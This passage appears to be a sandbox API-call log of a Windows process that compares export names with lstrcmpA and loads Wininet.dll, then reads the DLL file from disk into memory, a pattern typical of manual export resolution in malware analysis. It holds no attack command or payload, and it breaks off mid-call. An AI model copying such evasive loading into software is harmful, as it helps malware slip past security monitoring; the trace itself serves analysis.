lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0260.090] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0260.090] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0260.091] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0260.091] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0260.091] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0260.091] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0260.091] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0260.091] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0260.091] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0260.091] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0260.091] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0260.091] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0260.091] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0260.091] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0260.091] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0260.091] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0260.091] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0260.091] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0260.091] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0260.091] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0260.091] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0260.091] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0260.091] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0260.091] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0260.091] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0260.091] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0260.092] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0260.092] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0260.092] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0260.092] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0260.092] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0260.092] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0260.092] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0260.092] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0260.092] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0260.092] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0260.092] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0260.092] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0260.092] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0260.092] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0260.092] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0260.092] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0260.092] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0260.093] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0260.093] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0260.093] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0260.093] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0260.093] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0260.093] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0260.093] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0260.093] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0260.093] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0260.093] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0260.093] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0260.093] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0260.093] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0260.093] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0260.093] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0260.093] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0260.093] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0260.094] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0260.094] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0260.094] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0260.094] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0260.094] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0260.094] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0260.094] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0260.094] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0260.094] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0260.094] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0260.094] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0260.094] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0260.095] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0260.095] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0260.095] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0260.095] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0260.095] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0260.095] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0260.095] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0260.095] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0260.095] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0260.095] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0260.095] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0260.095] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0260.095] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0260.095] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0260.095] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0260.095] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0260.095] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0260.095] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0260.095] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0260.095] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0260.095] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0260.096] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0260.096] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0260.096] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0260.096] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0260.096] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0260.096] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0260.096] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0260.096] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0260.096] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0260.096] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0260.096] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0260.096] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0260.096] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0260.096] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0260.096] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0260.096] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0260.097] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0260.097] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0260.097] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0260.097] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0260.097] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0260.097] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0260.098] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0260.098] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0260.098] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0260.098] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0260.098] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0260.098] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0260.098] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0260.098] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0260.099] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0260.099] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0260.099] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0260.099] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0260.099] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0261.646] GetProcessHeap () returned 0x400000 [0261.646] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x42c5f0 | out: hHeap=0x400000) returned 1 [0261.646] GetProcessHeap () returned 0x400000 [0261.646] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x10) returned 0x4192c0 [0261.646] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0261.657] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0261.657] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0261.657] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0261.658] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0261.658] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0261.659] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0261.659] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0261.659] GetProcessHeap () returned 0x400000 [0261.659] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x286600) returned 0x3ff0040 [0261.665] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0261.665] ReadFile (in: hFile=0x140, lpBuffer=0x3ff0040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3ff0040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0262.086] CloseHandle (hObject=0x140) returned 1 [0262.087] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0262.087] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0262.087] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0262.087] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0262.087] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0262.087] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0262.087] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0262.087] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0262.087] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0262.087] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0262.087] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0262.087] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0262.088] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0262.088] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0262.088] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0262.088] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0262.088] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0262.088] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0262.088] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0262.088] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0262.088] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0262.088] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0262.088] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0262.088] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0262.088] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0262.088] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0262.088] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0262.088] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0262.088] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0262.088] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0262.088] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0262.088] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0262.089] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0262.089] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0262.089] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0262.089] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0262.089] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0262.089] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0262.089] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0262.089] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0262.089] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0262.089] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0262.089] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0262.089] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0262.089] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0262.089] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0262.089] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0262.089] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0262.089] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0262.089] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0262.089] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0262.089] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0262.089] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0262.089] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0262.089] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0262.089] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0262.089] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0262.090] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0262.090] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0262.090] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0262.090] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0262.090] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0262.090] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0262.090] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0262.090] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0262.090] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0262.090] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0262.090] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0262.090] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0262.090] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0262.090] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0262.090] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0262.090] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0262.090] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0262.090] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0262.090] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0262.090] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0262.090] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0262.090] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0262.090] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0262.090] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0262.091] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0262.091] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0262.091] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0262.091] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0262.091] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0262.091] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0262.091] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0262.091] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0262.091] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0262.091] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0262.091] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0262.091] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0262.091] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0262.091] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0262.091] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0262.091] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0262.091] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0262.091] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0262.091] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0262.091] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0262.091] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0262.091] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0262.091] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0262.092] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0262.092] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0262.092] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0262.092] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0262.092] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0262.092] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0262.092] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0262.092] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0262.092] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0262.092] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0262.092] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0262.092] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0262.092] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0262.092] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0262.092] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0262.092] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0262.092] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0262.092] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0262.092] lstrcmpA (lpString1="AppCacheGetInfo", 